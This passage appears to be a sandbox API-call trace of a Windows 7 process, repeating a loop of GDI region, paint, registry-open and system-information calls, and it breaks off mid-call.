[0017.648] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.648] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.648] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.648] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.648] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.648] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.648] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa2040713 [0017.648] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9804027d [0017.648] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b9e [0017.648] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b9f [0017.648] CombineRgn (hrgnDst=0x1040b9e, hrgnSrc1=0xa2040713, hrgnSrc2=0x9804027d, iMode=1) returned 1 [0017.648] CombineRgn (hrgnDst=0x1040b9f, hrgnSrc1=0xa2040713, hrgnSrc2=0x9804027d, iMode=4) returned 2 [0017.648] CreateSolidBrush (color=0xff) returned 0x2100b9d [0017.648] CreateSolidBrush (color=0xff0000) returned 0x1100ba0 [0017.648] DeleteObject (ho=0x1100ba0) returned 1 [0017.648] DeleteObject (ho=0x9804027d) returned 1 [0017.648] DeleteObject (ho=0xa2040713) returned 1 [0017.648] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.648] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.648] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.648] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.648] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.648] BeginPath (hdc=0x0) returned 0 [0017.648] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.648] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.648] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.648] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.648] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.649] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.649] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.649] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.649] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9904027d [0017.649] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa3040713 [0017.649] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba1 [0017.649] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba2 [0017.649] CombineRgn (hrgnDst=0x1040ba1, hrgnSrc1=0x9904027d, hrgnSrc2=0xa3040713, iMode=1) returned 1 [0017.649] CombineRgn (hrgnDst=0x1040ba2, hrgnSrc1=0x9904027d, hrgnSrc2=0xa3040713, iMode=4) returned 2 [0017.649] CreateSolidBrush (color=0xff) returned 0x2100ba0 [0017.649] CreateSolidBrush (color=0xff0000) returned 0x1100ba3 [0017.649] DeleteObject (ho=0x1100ba3) returned 1 [0017.649] DeleteObject (ho=0xa3040713) returned 1 [0017.649] DeleteObject (ho=0x9904027d) returned 1 [0017.649] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.649] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.649] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.649] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.649] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.649] BeginPath (hdc=0x0) returned 0 [0017.649] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.649] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.649] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.649] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.649] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.649] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.649] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.649] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.650] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa4040713 [0017.650] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9a04027d [0017.650] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba4 [0017.650] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba5 [0017.650] CombineRgn (hrgnDst=0x1040ba4, hrgnSrc1=0xa4040713, hrgnSrc2=0x9a04027d, iMode=1) returned 1 [0017.650] CombineRgn (hrgnDst=0x1040ba5, hrgnSrc1=0xa4040713, hrgnSrc2=0x9a04027d, iMode=4) returned 2 [0017.650] CreateSolidBrush (color=0xff) returned 0x2100ba3 [0017.650] CreateSolidBrush (color=0xff0000) returned 0x1100ba6 [0017.650] DeleteObject (ho=0x1100ba6) returned 1 [0017.650] DeleteObject (ho=0x9a04027d) returned 1 [0017.650] DeleteObject (ho=0xa4040713) returned 1 [0017.650] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.650] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.650] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.650] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.650] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.650] BeginPath (hdc=0x0) returned 0 [0017.650] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.650] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.650] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.650] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.650] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.650] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.650] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.650] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.650] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9b04027d [0017.650] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa5040713 [0017.650] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba7 [0017.651] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ba8 [0017.651] CombineRgn (hrgnDst=0x1040ba7, hrgnSrc1=0x9b04027d, hrgnSrc2=0xa5040713, iMode=1) returned 1 [0017.651] CombineRgn (hrgnDst=0x1040ba8, hrgnSrc1=0x9b04027d, hrgnSrc2=0xa5040713, iMode=4) returned 2 [0017.651] CreateSolidBrush (color=0xff) returned 0x2100ba6 [0017.651] CreateSolidBrush (color=0xff0000) returned 0x1100ba9 [0017.651] DeleteObject (ho=0x1100ba9) returned 1 [0017.651] DeleteObject (ho=0xa5040713) returned 1 [0017.651] DeleteObject (ho=0x9b04027d) returned 1 [0017.651] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.651] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.651] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.651] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.651] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.651] BeginPath (hdc=0x0) returned 0 [0017.651] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.651] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.651] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.651] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.651] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.651] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.651] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.651] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.651] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa6040713 [0017.651] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9c04027d [0017.651] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040baa [0017.651] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bab [0017.651] CombineRgn (hrgnDst=0x1040baa, hrgnSrc1=0xa6040713, hrgnSrc2=0x9c04027d, iMode=1) returned 1 [0017.651] CombineRgn (hrgnDst=0x1040bab, hrgnSrc1=0xa6040713, hrgnSrc2=0x9c04027d, iMode=4) returned 2 [0017.651] CreateSolidBrush (color=0xff) returned 0x2100ba9 [0017.651] CreateSolidBrush (color=0xff0000) returned 0x1100bac [0017.651] DeleteObject (ho=0x1100bac) returned 1 [0017.651] DeleteObject (ho=0x9c04027d) returned 1 [0017.652] DeleteObject (ho=0xa6040713) returned 1 [0017.652] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.652] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.652] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.652] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.652] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.652] BeginPath (hdc=0x0) returned 0 [0017.652] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.652] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.652] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.652] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.652] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.652] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.652] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.652] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.652] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9d04027d [0017.652] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa7040713 [0017.652] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bad [0017.652] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bae [0017.652] CombineRgn (hrgnDst=0x1040bad, hrgnSrc1=0x9d04027d, hrgnSrc2=0xa7040713, iMode=1) returned 1 [0017.652] CombineRgn (hrgnDst=0x1040bae, hrgnSrc1=0x9d04027d, hrgnSrc2=0xa7040713, iMode=4) returned 2 [0017.652] CreateSolidBrush (color=0xff) returned 0x2100bac [0017.652] CreateSolidBrush (color=0xff0000) returned 0x1100baf [0017.652] DeleteObject (ho=0x1100baf) returned 1 [0017.652] DeleteObject (ho=0xa7040713) returned 1 [0017.652] DeleteObject (ho=0x9d04027d) returned 1 [0017.652] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.652] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.652] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.653] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.653] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.653] BeginPath (hdc=0x0) returned 0 [0017.653] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.653] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.653] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.653] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.653] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.653] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.653] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.653] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.653] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa8040713 [0017.653] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9e04027d [0017.653] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb0 [0017.653] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb1 [0017.653] CombineRgn (hrgnDst=0x1040bb0, hrgnSrc1=0xa8040713, hrgnSrc2=0x9e04027d, iMode=1) returned 1 [0017.653] CombineRgn (hrgnDst=0x1040bb1, hrgnSrc1=0xa8040713, hrgnSrc2=0x9e04027d, iMode=4) returned 2 [0017.653] CreateSolidBrush (color=0xff) returned 0x2100baf [0017.653] CreateSolidBrush (color=0xff0000) returned 0x1100bb2 [0017.653] DeleteObject (ho=0x1100bb2) returned 1 [0017.653] DeleteObject (ho=0x9e04027d) returned 1 [0017.653] DeleteObject (ho=0xa8040713) returned 1 [0017.653] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.653] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.653] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.653] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.653] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.653] BeginPath (hdc=0x0) returned 0 [0017.653] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.653] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.653] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.653] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.653] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.653] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.654] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.654] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.654] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9f04027d [0017.654] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa9040713 [0017.654] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb3 [0017.654] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb4 [0017.654] CombineRgn (hrgnDst=0x1040bb3, hrgnSrc1=0x9f04027d, hrgnSrc2=0xa9040713, iMode=1) returned 1 [0017.654] CombineRgn (hrgnDst=0x1040bb4, hrgnSrc1=0x9f04027d, hrgnSrc2=0xa9040713, iMode=4) returned 2 [0017.654] CreateSolidBrush (color=0xff) returned 0x2100bb2 [0017.654] CreateSolidBrush (color=0xff0000) returned 0x1100bb5 [0017.654] DeleteObject (ho=0x1100bb5) returned 1 [0017.654] DeleteObject (ho=0xa9040713) returned 1 [0017.654] DeleteObject (ho=0x9f04027d) returned 1 [0017.654] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.654] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.654] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.654] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.654] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.654] BeginPath (hdc=0x0) returned 0 [0017.654] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.654] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.654] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.654] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.654] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.654] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.654] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.654] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.655] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaa040713 [0017.655] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa004027d [0017.655] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb6 [0017.655] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb7 [0017.655] CombineRgn (hrgnDst=0x1040bb6, hrgnSrc1=0xaa040713, hrgnSrc2=0xa004027d, iMode=1) returned 1 [0017.655] CombineRgn (hrgnDst=0x1040bb7, hrgnSrc1=0xaa040713, hrgnSrc2=0xa004027d, iMode=4) returned 2 [0017.655] CreateSolidBrush (color=0xff) returned 0x2100bb5 [0017.655] CreateSolidBrush (color=0xff0000) returned 0x1100bb8 [0017.655] DeleteObject (ho=0x1100bb8) returned 1 [0017.655] DeleteObject (ho=0xa004027d) returned 1 [0017.655] DeleteObject (ho=0xaa040713) returned 1 [0017.655] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.655] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.655] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.655] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.655] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.655] BeginPath (hdc=0x0) returned 0 [0017.655] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.655] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.655] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.655] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.655] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.655] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.655] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.655] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.655] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa104027d [0017.655] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xab040713 [0017.655] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bb9 [0017.655] CreateRectRgn (x1=0, y1=0, x2=0, 